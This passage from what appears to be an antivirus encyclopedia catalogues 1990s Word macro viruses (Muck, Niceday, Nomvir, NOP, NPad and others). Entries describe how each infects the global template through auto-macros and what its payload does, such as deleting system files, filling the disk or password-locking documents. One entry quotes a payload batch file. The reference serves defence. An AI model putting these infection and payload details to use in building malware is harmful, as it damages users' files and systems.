  21337. [Word_Muck.A]
  21338. Virus name: Word.Muck.A
  21339. Virus Type: Word macro virus
  21340. Number of macros: 6
  21341. Encrypted: No
  21342. Macro names: AutoOpen, AutoNew, AutoClose, AutoExit, FileSave
  21343.              FileSaveAs
  21344. Size of macros: 5329 Bytes
  21345. Place of origin: Africa
  21346. Date of origin: Spring 1997
  21347. Destructive: No
  21348. Seen In-The-Wild: No
  21349. Description:
  21350.  
  21351. Muck infects the global template when an infected document is
  21352. opened. Further documents become infected when they are saved
  21353. (FileSave and FileSaveAs).
  21354.  
  21355. Muck is another virus that is not destructive, it just displays
  21356. the message "   Muck   " with a probability of 1/5.
  21357.  
  21358. Muck also contains a code from an ineffective macro anti-virus
  21359. solution. The macros "AutoClose", "AutoExit" and "AutoNew"
  21360. have been snatched from ScanProt.
  21361.  
  21362.  
  21363.  
  21364. [Word_Muck.B]
  21365. Virus name: Word.Muck.B
  21366. Virus Type: Word macro virus
  21367. Number of macros: 6
  21368. Encrypted: No
  21369. Macro names: AutoOpen, AutoNew, AutoClose, AutoExit, FileSave
  21370.              FileSaveAs
  21371. Size of macros: 2781 Bytes
  21372. Place of origin: Africa
  21373. Date of origin: Spring 1997
  21374. Destructive: No
  21375. Seen In-The-Wild: No
  21376. Description:
  21377.  
  21378. Muck.B infects the global template when an infected document
  21379. is opened. Further documents become infected when they are
  21380. saved (FileSave and FileSaveAs).
  21381.  
  21382. The main difference between this new variant and the original
  21383. Muck.A virus it that this new variant snatched other macros
  21384. from the ScanProt macro anti-virus solution (AutoClose and
  21385. AutoNew).
  21386.  
  21387. Muck.B is another virus that is not destructive, it just displays
  21388. the message "   Muck   " with a probability of 1/5.
  21389.  
  21390.  
  21391.  
  21392. [Word_Muck.C]
  21393. Virus name: Word.Muck.C
  21394. Virus Type: Word macro virus
  21395. Number of macros: 6
  21396. Encrypted: No
  21397. Macro names: AutoOpen, AutoNew, AutoClose, AutoExit, FileSave
  21398.              FileSaveAs
  21399. Size of macros: 4327 Bytes
  21400. Place of origin: Unknown
  21401. Date of origin: Spring 1997
  21402. Destructive: No
  21403. Seen In-The-Wild: No
  21404. Description:
  21405.  
  21406. Muck.C infects the global template when an infected document
  21407. is opened. Further documents become infected when they are
  21408. saved (FileSave and FileSaveAs).
  21409.  
  21410. The main difference between this new variant and the original
  21411. Muck.A virus it that Muck.C has some minor code changes.
  21412. The AutoClose and AutoNew macros are identical to the ones
  21413. found in Muck.B virus.
  21414.  
  21415. Muck.C is another virus that is not destructive, it just displays
  21416. the message "   Muck   " with a probability of 1/5.
  21417.  
  21418.  
  21419. [Word_Muck.D]
  21420. Virus name: Word.Muck.D
  21421. Virus Type: Word macro virus
  21422. Number of macros: 6
  21423. Encrypted: No
  21424. Macro names: AutoOpen, AutoNew, AutoClose, AutoExit, FileSave
  21425.              FileSaveAs
  21426. Size of macros: 1619 Bytes
  21427. Place of origin: Unknown
  21428. Date of origin: Spring 1997
  21429. Destructive: No
  21430. Seen In-The-Wild: No
  21431. Description:
  21432.  
  21433. Muck.D infects the global template when an infected document
  21434. is opened. Further documents become infected when they are
  21435. saved (FileSave and FileSaveAs).
  21436.  
  21437. The main difference between this new variant and the previous
  21438. Muck.A virus it that Muck.D has some minor code changes.
  21439. The AutoNew macro is new, while the AutoExit macro was
  21440. taken from the B variant.
  21441.  
  21442. Muck.D also exists as a Word 97 virus. It was converted
  21443. from an older version of Word (6.0 or 7.0) to Word 8.0!
  21444.  
  21445. Muck.D is another virus that is not destructive, it just displays
  21446. the message "   Muck   " with a probability of 1/5.
  21447.  
  21448.  
  21449. [Word_Muck.E]
  21450. Virus name: Word.Muck.E
  21451. Virus Type: Word macro virus
  21452. Number of macros: 6
  21453. Encrypted: No
  21454. Macro names: AutoOpen, AutoNew, AutoClose, AutoExit, FileSave
  21455.              FileSaveAs
  21456. Size of macros: 1648 Bytes
  21457. Place of origin: Unknown
  21458. Date of origin: Spring 1997
  21459. Destructive: No
  21460. Seen In-The-Wild: No
  21461. Description:
  21462.  
  21463. Muck.E infects the global template when an infected document
  21464. is opened. Further documents become infected when they are
  21465. saved (FileSave and FileSaveAs).
  21466.  
  21467. The main difference between this new variant and the previous
  21468. Muck.B virus it that Muck.E has some minor code changes.
  21469.  
  21470. Muck.E is another virus that is not destructive, it just displays
  21471. the message "   Muck   " with a probability of 1/5.
  21472.  
  21473.  
  21474. [Word_NF.A (a.k.a. Names)]
  21475. Virus name: Word.NF.A (a.k.a. Names)
  21476. Virus Type: Word macro virus
  21477. Number of macros: 2
  21478. Encrypted: Yes
  21479. Macro names: AutoClose, NF
  21480. Size of macros: 286 Bytes
  21481. Place of origin: USA
  21482. Date of origin: Summer 1996
  21483. Destructive: No
  21484. Common In-The-Wild: No
  21485. Description:
  21486.  
  21487. NF infects documents that are closed (AutoClose). Infected
  21488. documents are converted internally to templates which is very
  21489. common for macro viruses.
  21490.  
  21491. Upon infection, NF will display the following message at the
  21492. bottom of the screen:
  21493.  
  21494. "   Traced!    "
  21495.  
  21496.  
  21497. [Word_Niceday.A]
  21498. Virus name: Word.Niceday.A
  21499. Virus Type: Word macro virus
  21500. Number of macros: 4
  21501. Encrypted: No
  21502. Macro names: VClose, Payload, AutoExit, AutoOpen, VOpen, AutoClose
  21503. Size of macros: 886 Bytes
  21504. Place of origin: Unknown
  21505. Date of origin: Unknown
  21506. Destructive: No
  21507. Seen In-The-Wild: No
  21508. Description:
  21509.  
  21510. Niceday infects the global template (normal.dot) when an
  21511. infected file is opened.  Further documents become infected
  21512. when they are closed (AutoClose).
  21513.  
  21514. Niceday triggers every day of the year and displays the
  21515. following message:
  21516.  
  21517. "   Have a Nice Day   "
  21518.  
  21519. Niceday includes parts of the Concept virus. The "Payload"
  21520. macro is identical to the one located in the Concept.A virus.
  21521.  
  21522.  
  21523. [Word_Niceday.B]
  21524. Virus name: Word.Niceday.B
  21525. Virus Type: Word macro virus
  21526. Number of macros: 4
  21527. Encrypted: No
  21528. Macro names: VClose, Payload, AutoExit, AutoOpen,
  21529.              (VOpen, AutoClose)
  21530. Size of macros: 886 Bytes
  21531. Place of origin: Unknown
  21532. Date of origin: Winter 1996
  21533. Destructive: No
  21534. Seen In-The-Wild: No
  21535. Description:
  21536.  
  21537. Niceday.B infects the global template (normal.dot) when an
  21538. infected document is opened. Further documents become
  21539. infected when they are closed (AutoClose).
  21540.  
  21541. The main difference between this new variant and the previous
  21542. Niceday.A virus is that Niceday.B has some modified codes.
  21543.  
  21544.  
  21545. [Word_Niceday.C]
  21546. Virus name: Word.Niceday.C
  21547. Virus Type: Word macro virus
  21548. Number of macros: 4
  21549. Encrypted: No
  21550. Macro names: VClose, Payload, AutoExit, AutoOpen,
  21551.              (VOpen, AutoClose)
  21552. Size of macros: 886 Bytes
  21553. Place of origin: Unknown
  21554. Date of origin: Winter 1996
  21555. Destructive: No
  21556. Seen In-The-Wild: No
  21557. Description:
  21558.  
  21559. Niceday.C infects the global template (normal.dot) when an
  21560. infected document is opened. Further documents become
  21561. infected when they are closed (AutoClose).
  21562.  
  21563. The main difference between this new variant and the previous
  21564. Niceday.A virus is that Niceday.C has some corrupted codes.
  21565.  
  21566.  
  21567. [Word_Niceday.D]
  21568. Virus name: Word.Niceday.D
  21569. Virus Type: Word macro virus
  21570. Number of macros: 4
  21571. Encrypted: No
  21572. Macro names: VClose, Payload, AutoExit, AutoOpen,
  21573.              (VOpen, AutoClose)
  21574. Size of macros: 886 Bytes
  21575. Place of origin: Unknown
  21576. Date of origin: Spring 1997
  21577. Destructive: No
  21578. Seen In-The-Wild: No
  21579. Description:
  21580.  
  21581. Niceday.D infects the global template (normal.dot) when an
  21582. infected document is opened. Further documents become
  21583. infected when they are closed (AutoClose).
  21584.  
  21585. The main difference between this new variant and the previous
  21586. Niceday.A virus is that Niceday.D has a corrupted "Payload"
  21587. macro.
  21588.  
  21589.  
  21590. [Word_Niceday.E]
  21591. Virus name: Word.Niceday.E
  21592. Virus Type: Word macro virus
  21593. Number of macros: 4
  21594. Encrypted: No
  21595. Macro names: VClose, Payload, AutoExit, AutoOpen,
  21596.              (VOpen, AutoClose)
  21597. Size of macros: 886 Bytes
  21598. Place of origin: Unknown
  21599. Date of origin: Spring 1997
  21600. Destructive: No
  21601. Seen In-The-Wild: No
  21602. Description:
  21603.  
  21604. Niceday.E infects the global template (normal.dot) when an
  21605. infected document is opened. Further documents become
  21606. infected when they are closed (AutoClose).
  21607.  
  21608. The main difference between this new variant and the previous
  21609. Niceday.A virus is that Niceday.E has a corrupted "Payload"
  21610. and "AutoExit" macros.
  21611.  
  21612.  
  21613. [Word_Niceday.F]
  21614. Virus name: Word.Niceday.F
  21615. Virus Type: Word macro virus
  21616. Number of macros: 4
  21617. Encrypted: No
  21618. Macro names: VClose, Payload, AutoExit, AutoOpen,
  21619.              (VOpen, AutoClose)
  21620. Size of macros: 886 Bytes
  21621. Place of origin: Unknown
  21622. Date of origin: Spring 1997
  21623. Destructive: No
  21624. Seen In-The-Wild: Yes
  21625. Description:
  21626.  
  21627. Niceday.F infects the global template (normal.dot) when an
  21628. infected document is opened. Further documents become
  21629. infected when they are closed (AutoClose).
  21630.  
  21631. The main difference between this new variant and previous
  21632. Niceday viruses is that Niceday.F has a differently corrupted
  21633. "AutoExit" macro.
  21634.  
  21635.  
  21636. [Word_Niceday.G]
  21637. Virus name: Word.Niceday.G
  21638. Virus Type: Word macro virus
  21639. Number of macros: 4
  21640. Encrypted: No
  21641. Macro names: VClose, Payload, AutoExit, AutoOpen,
  21642.              (VOpen, AutoClose)
  21643. Size of macros: 910 Bytes
  21644. Place of origin: Spain
  21645. Date of origin: Spring 1997
  21646. Destructive: No
  21647. Seen In-The-Wild: No
  21648. Description:
  21649.  
  21650. Niceday.G infects the global template (normal.dot) when an
  21651. infected document is opened. Further documents become
  21652. infected when they are closed (AutoClose).
  21653.  
  21654. The main difference between this new variant and previous
  21655. Niceday viruses is that Niceday.G has a different message.
  21656. It displays " Pepe Truene, The mooooooooore Faster" instead
  21657. of " Have a NiceDay!".
  21658.  
  21659. Niceday.G also has an additional comment in the "AutoClose"
  21660. macro.
  21661.  
  21662.  
  21663. [Word_Niceday.H]
  21664. Virus name: Word.Niceday.H
  21665. Virus Type: Word macro virus
  21666. Number of macros: 4
  21667. Encrypted: No
  21668. Macro names: VClose, Payload, AutoExit, AutoOpen,
  21669.              (VOpen, AutoClose)
  21670. Size of macros: 886 Bytes
  21671. Place of origin: Unknown
  21672. Date of origin: Spring 1997
  21673. Destructive: No
  21674. Seen In-The-Wild: No
  21675. Description:
  21676.  
  21677. Niceday.H infects the global template (normal.dot) when an
  21678. infected document is opened. Further documents become
  21679. infected when they are closed (AutoClose).
  21680.  
  21681. The main difference between this new variant and previous
  21682. Niceday viruses is that Niceday.H has a differently corrupted
  21683. "Payload" macro.
  21684.  
  21685.  
  21686. [Word_Niceday.I]
  21687. Virus name: Word.Niceday.I
  21688. Virus Type: Word macro virus
  21689. Number of macros: 4
  21690. Encrypted: No
  21691. Macro names: VClose, Payload, AutoExit, AutoOpen,
  21692.              (VOpen, AutoClose)
  21693. Size of macros: 886 Bytes
  21694. Place of origin: Unknown
  21695. Date of origin: Spring 1997
  21696. Destructive: No
  21697. Seen In-The-Wild: No
  21698. Description:
  21699.  
  21700. Niceday.I infects the global template (normal.dot) when an
  21701. infected document is opened. Further documents become
  21702. infected when they are closed (AutoClose).
  21703.  
  21704. The main difference between this new variant and previous
  21705. Niceday viruses is that Niceday.I has some differently
  21706. corrupted macros.
  21707.  
  21708.  
  21709. [Word_Niceday.J]
  21710. Virus name: Word.Niceday.J
  21711. Virus Type: Word macro virus
  21712. Number of macros: 4
  21713. Encrypted: No
  21714. Macro names: VClose, Payload, AutoExit, AutoOpen,
  21715.              (VOpen, AutoClose)
  21716. Size of macros: 886 Bytes
  21717. Place of origin: Unknown
  21718. Date of origin: Spring 1997
  21719. Destructive: No
  21720. Seen In-The-Wild: No
  21721. Description:
  21722.  
  21723. Niceday.J infects the global template (normal.dot) when an
  21724. infected document is opened. Further documents become
  21725. infected when they are closed (AutoClose).
  21726.  
  21727. The main difference between this new variant and previous
  21728. Niceday viruses is that Niceday.J has a differently
  21729. corrupted "Payload" macro.
  21730.  
  21731.  
  21732. [Word_Niceday.K]
  21733. Virus name: Word.Niceday.K
  21734. Virus Type: Word macro virus
  21735. Number of macros: 4
  21736. Encrypted: No
  21737. Macro names: VClose, Payload, AutoExit, AutoOpen,
  21738.              (VOpen, AutoClose)
  21739. Size of macros: 886 Bytes
  21740. Place of origin: Unknown
  21741. Date of origin: June 1997
  21742. Destructive: No
  21743. Seen In-The-Wild: No
  21744. Description:
  21745.  
  21746. Niceday.K infects the global template (normal.dot) when an
  21747. infected document is opened. Further documents become
  21748. infected when they are closed (AutoClose).
  21749.  
  21750. The main difference between this new variant and previous
  21751. Niceday viruses is that Niceday.K has a differently
  21752. corrupted "AutoExit" macro.
  21753.  
  21754.  
  21755. [Word_Niceday.L]
  21756. Virus name: Word.Niceday.L
  21757. Virus Type: Word macro virus
  21758. Number of macros: 4
  21759. Encrypted: No
  21760. Macro names: VClose, Payload, AutoExit, AutoOpen,
  21761.              (VOpen, AutoClose)
  21762. Size of macros: 909 Bytes
  21763. Place of origin: Unknown
  21764. Date of origin: June 1997
  21765. Destructive: No
  21766. Seen In-The-Wild: No
  21767. Description:
  21768.  
  21769. Niceday.L infects the global template (normal.dot) when an
  21770. infected document is opened. Further documents become
  21771. infected when they are closed (AutoClose).
  21772.  
  21773. The main difference between this new variant and the previous
  21774. Niceday.D virus is that Niceday.L has a different message.
  21775. It displays " Your files will be deleted in 24 hours " instead
  21776. of " Have a NiceDay!".
  21777.  
  21778.  
  21779. [Word_Niki.A]
  21780. Virus name: Word.Niki.A
  21781. Virus Type: Word macro virus
  21782. Number of macros: 6
  21783. Encrypted: Yes
  21784. Macro names: AutoExec, AutoOpen, FileApri, FileSalvaConNome,
  21785.              StrumMacro, NiKi
  21786. Size of macros: 7939 Bytes
  21787. Place of origin: Italy
  21788. Date of origin: Unknown
  21789. Destructive: Yes
  21790. Seen In-The-Wild: No
  21791. Description:
  21792.  
  21793. Niki is another macro virus for the Italian version of Microsoft
  21794. Word.
  21795.  
  21796. Niki infects the global template (normal.dot) when an infected
  21797. document is opened.  Further documents become infected
  21798. when they are opened (FileApri) and saved (FileSalvaConNome).
  21799.  
  21800. When the "NiKi" macro is activated, Niki deletes all .doc files
  21801. and all .dll files in the following directories:
  21802.  
  21803. C:\MSOFFICE
  21804. C:\WINDOWS\SYSTEM
  21805.  
  21806.  
  21807. [Word_Nikita.A and Word.Nikita.A1]
  21808. Virus name: Word.Nikita.A and Word.Nikita.A1
  21809. Virus Type: Word macro virus
  21810. Number of macros: 2 or 1
  21811. Encrypted: Yes
  21812. Macro names: AutoOpen, Fun
  21813. Size of macros: 1028 Bytes in .doc files
  21814.                 309 Bytes in global template
  21815. Place of origin: Unknown
  21816. Date of origin: Unknown
  21817. Destructive: Yes
  21818. Seen In-The-Wild: No
  21819. Description:
  21820.  
  21821. Nikita is a trojan, not a virus. It does not replicate.
  21822.  
  21823. Nikita activates when an infected document is opened. It
  21824. displays a face, with moving eyes and mouth, and the
  21825. following text:
  21826.  
  21827. "   Hello Guys! Oh, please stay here and look!   "
  21828.  
  21829. (the text is only available in the original trojanized document)
  21830.  
  21831. Upon activation, the "Fun" macro is saved in the global
  21832. template under the name "AutoOpen". Once a new document is opened
  21833. (from an infected document) the payload triggers and Nikita creates
  21834. files, slowly filling the hard drive. The files contain the
  21835. following text:
  21836.  
  21837. "   Nikita (1997) Nightmare Joker [SLAM]   "
  21838.  
  21839.  
  21840. [Word_NJ-WMDLK1.A (a.k.a. BlackKnight)]
  21841. Virus name: Word.NJ-WMDLK1.A (a.k.a. BlackKnight)
  21842. Virus Type: Word macro virus
  21843. Number of macros: 2
  21844. Encrypted: Yes
  21845. Macro names: DQEQDIDT, GPDRCQJZ
  21846. Size of macros: 3680 Bytes
  21847. Place of origin: Unknown
  21848. Date of origin: Unknown
  21849. Destructive: No
  21850. Seen In-The-Wild: No
  21851. Description:
  21852.  
  21853. NJ-WMDLK1.A infects the global template (normal.dot) when
  21854. an infected document is opened and the following key is
  21855. pressed:
  21856.  
  21857. "   SPACE   " assigned to the DQEQDIDT macro
  21858.  
  21859. Further documents become infected when " SPACE " is pressed
  21860. again.
  21861.  
  21862. NJ-WMDLK1.A is very obvious to the user. Whenever
  21863. " SPACE " is pressed, the letter " E " will appear and when
  21864. " E " is pressed, an empty space (spacebar function) will
  21865. appear.
  21866.  
  21867. This virus was distributed with NJ-WMDLK1.B and
  21868. NJ-WMDLK1.C inside a macro virus construction kit.
  21869. The kit is available in 5 different versions and is capable
  21870. of creating macro viruses and macro trojans.
  21871.  
  21872.  
  21873. [Word_NJ-WMDLK1.B (a.k.a. BlackEnd)]
  21874. Virus name: Word.NJ-WMDLK1.B (a.k.a. BlackEnd)
  21875. Virus Type: Word macro virus
  21876. Number of macros: 5
  21877. Encrypted: Yes
  21878. Macro names: AutoNew, AutoClose, AutoExec, AutoOpen, BlackEnd
  21879. Size of macros: 2102 Bytes
  21880. Place of origin: Unknown
  21881. Date of origin: Unknown
  21882. Payload: Yes
  21883. Seen In-The-Wild: No
  21884. Description:
  21885.  
  21886. NJ-WMDLK1.B infects the global template (normal.dot) when
  21887. an infected document is opened. Further documents become
  21888. infected when they are also opened (AutoOpen), closed
  21889. (AutoClose), Microsoft Word started (AutoExec), and when
  21890. a new file is created (AutoNew).
  21891.  
  21892. On May 22nd of each year, Nj-WMDLK1.B activates its
  21893. payload and inserts the following text to a newly created
  21894. template:
  21895.  
  21896. "   You are infected with the BlackEbd Virus! [D.K.]
  21897.  
  21898. After that is creates the following batch file and launches it:
  21899.  
  21900.  C:\DOSSYS.BAT
  21901.  
  21902. The file contains the following:
  21903.  
  21904. "   echo off   "
  21905. "   doskey Fun=setver win.com 3.00   "
  21906. "   echo off   "
  21907. "   Fun   "
  21908.  
  21909. This virus was distributed with NJ-WMDLK1.A and
  21910. NJ-WMDLK1.C inside a macro virus construction kit. The kit
  21911. is available in 5 different versions and is capable of creating
  21912. macro viruses and macro trojans.
  21913.  
  21914.  
  21915. [Word_NJ-WMVCK2.B (Kit) (a.k.a. NJK-gen)]
  21916. Virus Kit Name: Word.NJ-WMVCK2.B (Kit) (a.k.a. NJK-gen)
  21917. Virus Type: Word macro virus
  21918. Size of macros: 264915 Bytes
  21919. Number of macros: 20
  21920. Place of origin: Germany
  21921. Date of origin: July 1996
  21922. Description:
  21923.  
  21924. This macro virus construction kit was the first one to appear
  21925. during the Summer of 1996. It was written in Germany and only
  21926. works with the German version of Microsoft Word.
  21927.  
  21928. All viruses, created with the kit, have the following common
  21929. characteristics:
  21930.  
  21931. 1. Consist of 7 or 8 macros
  21932.  
  21933. 2. 7 macros have fixed names
  21934.  
  21935. 3. Last macro name is chosen by the user
  21936.  
  21937. The kit offers to drop 9 predefined DOS-based viruses upon
  21938. activation. Due to a bug in the macro code only the dropper
  21939. for the BOZA.C virus works. Boza.C is classified as an
  21940. intended virus and does not infect any user files. However,
  21941. the chance of corruption still exists.
  21942.  
  21943. All the viruses check the system time and if the value of the
  21944. second field is 10, the following text is added to the printed
  21945. document:
  21946.  
  21947. "   Nightmare Joker's WMVCK   "
  21948.  
  21949. The construction kit also offers to add some additional text to
  21950. the printed document. The construction kit user only needs to
  21951. type in the text when creating the virus.
  21952.  
  21953. Below are the viruses that can be created with the kit:
  21954.  
  21955. 1.  WMVCK.Casino  - This variant will drop Casino.2330.
  21956.  
  21957. 2.  WMVCK.VLS     - This variant will drop VCL.Markt.1533.
  21958.  
  21959. 3.  WMVCK.MTE     - This variant will drop MTE.Shocker.
  21960.  
  21961. 4.  WMVCK.Sirius  - This variant will drop Sirius.Alive.4608.
  21962.  
  21963. 5.  WMVCK.SMEG    - This variant will drop SMEG.Queeg.
  21964.  
  21965. 6.  WMVCK.Tequila - This variant will drop Tequila.
  21966.  
  21967. 7.  WMVCK.VICE    - This variant will drop VICE.05.Code.3952.
  21968.  
  21969. 8.  WMVCK.Uniform - This variant will drop Uniform.
  21970.  
  21971. 9.  WMVCK.Boza.C  - This variant will drop Boza.
  21972.  
  21973. 10. WMVCK.Tremor  - This variant will drop Tremor.
  21974.  
  21975. 11. WMVCK.NoDrop  - This variant will not drop any virus.
  21976.  
  21977.  
  21978. [Word_NJ-WMDLK1.C (a.k.a. Grunt)]
  21979. Virus name: Word.NJ-WMDLK1.C (a.k.a. Grunt)
  21980. Virus Type: Word macro virus
  21981. Number of macros: 2
  21982. Encrypted: Yes
  21983. Macro names: XxGRUNTxX1, XxGRUNTxX2
  21984. Size of macros: 1461 Bytes
  21985. Place of origin: Unknown
  21986. Date of origin: Unknown
  21987. Destructive: No
  21988. Seen In-The-Wild: No
  21989. Description:
  21990.  
  21991. NJ-WMDLK1.C infects the global template (normal.dot) when
  21992. an infected document is opened and one of the following keys
  21993. is pressed:
  21994.  
  21995. "   E   "  assigned to the XxGRUNTxX1 macro
  21996. "   I   "  assigned to the XxGRUNTxX2 macro
  21997.  
  21998. Further documents become infected when again " E " or " I " is
  21999. pressed.
  22000.  
  22001. The following text can be found inside the virus:
  22002.  
  22003. "   A Virus from Nightmare Joker's Demolition Kit!   "
  22004.  
  22005. This virus was distributed with NJ-WMDLK1.A and
  22006. NJ-WMDLK1.B inside a macro virus construction kit. The kit
  22007. is available in 5 different versions and is capable of creating
  22008. macro viruses and macro trojans.
  22009.  
  22010.  
  22011.  
  22012. [Word_NJ-WMDLK1.D (a.k.a. Archie)]
  22013. Virus name: Word.NJ-WMDLK1.D (a.k.a. Archie)
  22014. Virus Type: Word macro virus
  22015. Number of macros: 5
  22016. Encrypted: Yes
  22017. Macro names: AutoNew, AutoClose, AutoExec, AutoOpen, BlackEnd
  22018. Size of macros: 2102 Bytes
  22019. Place of origin: Unknown
  22020. Date of origin: Unknown
  22021. Payload: No
  22022. Seen In-The-Wild: No
  22023. Description:
  22024.  
  22025. NJ-WMDLK1.D infects the global template (normal.dot) when
  22026. an infected document is opened. Further documents become
  22027. infected when they are also opened (AutoOpen), closed
  22028. (AutoClose), Microsoft Word started (AutoExec), and when a
  22029. new file is created (AutoNew).
  22030.  
  22031. This virus is another virus created with a macro virus
  22032. construction kit. The original kit is available in 5 different
  22033. versions and is capable of creating macro viruses and
  22034. macro trojans.
  22035.  
  22036. The following text can be found in the "Archie" macro:
  22037.  
  22038. " A Virus from Nightmare Joker's Demolition Kit!   "
  22039. " Translated into English by Dark Night (VBB)   "
  22040.  
  22041.  
  22042. [Word_Nomvir.A:De]
  22043. Virus name: Word.Nomvir.A:De
  22044. Virus Type: Word macro virus
  22045. Number of macros: 10
  22046. Encrypted: Yes
  22047. Macro names: AutoExec, AutoNew, AutoOpen, DateiSpeichern,
  22048.              DateiSpeichernUnter, DateiBeenden, ExtrasOptionen,
  22049.              DateiDokvorlagen, DateiDrucken, FuckIt,
  22050. Size of macros: 5660 Bytes
  22051. Place of origin: Germany
  22052. Date of origin: January 1997
  22053. Payload: Yes
  22054. Seen In-The-Wild: No
  22055. Description:
  22056.  
  22057. Nomvir infects the global template (normal.dot) when a new
  22058. document is created (AutoNew) or Microsoft Word is started
  22059. (AutoExec).  Further documents become infected when they
  22060. are saved with the DateiSpeichern or DateiSpeichernUnter
  22061. command.
  22062.  
  22063. Nomvir includes various destructive payloads. It tries to
  22064. replace words with the word "hell", deletes C:\Autoexec.bat
  22065. and C:\Config.sys, or adds the following text at the end of a
  22066. document:
  22067.  
  22068. "   Fuck Microsoft & Bill Gates   "
  22069.  
  22070. Other payloads are activated on the 23rd of each month,
  22071. Saturday 13th, January 1st and December 25th.
  22072. On these days it tries to delete the following files:
  22073.  
  22074. "   C:\WINDOWS\USER.DAT   "
  22075. "   C:\WINDOWS\USER.DA0   "
  22076. "   C:\WINDOWS\SYSTEM.DA0   "
  22077. "   C:\WINDOWS\SYSTEM.DAT   "
  22078.  
  22079. Novir.A does not activate its payloads if it finds the following
  22080. entry in the "Compatibility" section of WINI.INI:
  22081.  
  22082. Nomvir=0x0690690"
  22083.  
  22084. The following message is displayed when the Tools/Macro
  22085. menu is selected:
  22086.  
  22087. "   Nicht genⁿgend Arbeitsspeicher !   "
  22088.  
  22089. (translated: Not enough memory)
  22090.  
  22091. Another message is displayed when the "DateiDokvorlagen"
  22092. menu is selected:
  22093.  
  22094. "   Interner Fehler !   "
  22095.  
  22096. (translated: Internal Error)
  22097.  
  22098.  
  22099. [Word_Nomvir.B:De]
  22100. Virus name: Word.Nomvir.B:De
  22101. Virus Type: Word macro virus
  22102. Number of macros: 10
  22103. Encrypted: Yes
  22104. Macro names: AutoExec, AutoNew, AutoOpen, DateiSpeichern,
  22105.              DateiSpeichernUnter, DateiBeenden, ExtrasOptionen,
  22106.              DateiDokvorlagen, DateiDrucken, FuckIt,
  22107. Size of macros: 5660 Bytes
  22108. Place of origin: Germany
  22109. Date of origin: January 1997
  22110. Payload: Yes
  22111. Seen In-The-Wild: No
  22112. Description:
  22113.  
  22114. Nomvir.B infects the global template (normal.dot) when a new
  22115. document is created (AutoNew) or Microsoft Word is started
  22116. (AutoExec).  Further documents become infected when they
  22117. are saved with the DateiSpeichern or DateiSpeichernUnter
  22118. command.
  22119.  
  22120. The main difference between this new variant and the "A"
  22121. variant is that the "DateiDrucken" and "DateiBeenden"
  22122. macros are not corrupted anymore.
  22123.  
  22124. DateiBeenden (translated: FileClose) is responsible for another
  22125. new payload. With a chance of 20 percent, Nomvir.B adds a
  22126. password to the active document. This password is made up of 5
  22127. characters (iATeS) and another 6th character that is randomly chosen.
  22128.  
  22129. For more information, please refer to the Nomvir.A virus
  22130. description.
  22131.  
  22132.  
  22133. [Word_Nop.A:De]
  22134. Virus name: Word.Nop.A:De
  22135. Virus Type: Word macro virus
  22136. Number of macros: 2
  22137. Encrypted: No
  22138. Macro names: AutoOpen, NOP (DateiSpeichern)
  22139. Size of macros: 246 Bytes
  22140. Place of origin: Germany
  22141. Date of origin: Summer 1996
  22142. Destructive: No
  22143. Common In-The-Wild: Yes
  22144. Description:
  22145.  
  22146. NOP.A is a very primitive virus and has only very few necessary
  22147. commands in order to replicate. The only special characteristic
  22148. for the NOP virus is that it turns off the prompting of Word
  22149. before saving the global template (NORMAL.DOT).
  22150.  
  22151. When an infected document is opened, NOP transfers itself to
  22152. the global template and renames "NOP" into "DateiSpeichern".
  22153. Additional documents become infected when they are saved.
  22154.  
  22155.  
  22156. [Word_Nop.B:De]
  22157. Virus name: Word.Nop.B:De
  22158. Virus Type: Word macro virus
  22159. Number of macros: 2
  22160. Encrypted: No
  22161. Macro names: AutoOpen, NOP (DateiSpeichern)
  22162. Size of macros: 250 Bytes
  22163. Place of origin: Germany
  22164. Date of origin: Summer 1996
  22165. Destructive: No
  22166. Common In-The-Wild: No
  22167. Description:
  22168.  
  22169. The difference between the this new variant and NOP.A is that
  22170. NOP.B does not turn off the prompting of Microsoft Word
  22171. before saving the global template (normal.dot). It also enters
  22172. the word "Testvirus" at the insertion point.
  22173.  
  22174. For more information, please refer to the NOP.A virus.
  22175.  
  22176.  
  22177. [Word_NOP.D]
  22178. Virus name: Word.NOP.D
  22179. Virus Type: Word macro virus
  22180. Number of macros: 1
  22181. Encrypted: No
  22182. Macro names: AutoOpen, NOP
  22183. Size of macros: 234 Bytes
  22184. Place of origin: USA
  22185. Date of origin: January 1997
  22186. Destructive: No
  22187. Common In-The-Wild: No
  22188. Description:
  22189.  
  22190. NOP.D is a new variant based on the original Nop.A virus.
  22191. The only difference between the two viruses is that NOP.D is
  22192. able to infect the English version of Microsoft Word, while
  22193. NOP.A only works with the German version.
  22194.  
  22195. For more information, please refer to the NOP.A virus.
  22196.  
  22197. [Word_NPad.A (DOEUNPAD)]
  22198. Virus name: Word.NPad.A (DOEUNPAD)
  22199. Virus Type: Word macro virus
  22200. Number of macros: 1
  22201. Encrypted: Yes
  22202. Macro names: AutoOpen
  22203. Size of macros: 1831 Bytes
  22204. Place of origin: Bandung, Indonesia
  22205. Date of origin: March 1996
  22206. Payload: Yes
  22207. Common In-The-Wild: Yes
  22208. Description:
  22209.  
  22210. NPad activates when an infected document is opened
  22211. (AutoOpen).
  22212.  
  22213. NPad.A also modifies the "compatibility" section inside the
  22214. WIN.INI file. It adds a counter under the name of "NPAD328"
  22215. and each time the virus is activated, it adds 1 to its value.
  22216. Upon reaching a value of 23 it resets the counter and displays
  22217. the following message in the status bar:
  22218.  
  22219. "   DOEUNPAD94 v 2.21 (c) Maret 1996 Bandung, Indonesia   "
  22220.  
  22221.  
  22222. [Word_NPad.B]
  22223. Virus name: Word.NPad.B
  22224. Virus Type: Word macro virus
  22225. Number of macros: 1
  22226. Encrypted: Yes
  22227. Macro names: AutoOpen
  22228. Size of macros: 1831 Bytes
  22229. Place of origin: Bandung, Indonesia
  22230. Date of origin: March 1996
  22231. Destructive: No
  22232. Seen In-The-Wild: No
  22233. Description:
  22234.  
  22235. The difference between this new variant and the original NPad
  22236. virus is that some bytes have been patched in the macro virus
  22237. code. The result of the change is an invalid instruction. NPad.B
  22238. is able to infect the global template and further documents,
  22239. yet upon reaching the invalid part of the macro code, it
  22240. displays a syntax error message.
  22241.  
  22242. The message from the original NPad virus is never displayed.
  22243.  
  22244.  
  22245. [Word_NPad.C]
  22246. Virus name: Word.NPad.C
  22247. Virus Type: Word macro virus
  22248. Number of macros: 1
  22249. Encrypted: Yes
  22250. Macro names: AutoOpen
  22251. Size of macros: 1831 Bytes
  22252. Place of origin: Unknown
  22253. Date of origin: January 1997
  22254. Destructive: No
  22255. Seen In-The-Wild: No
  22256. Description:
  22257.  
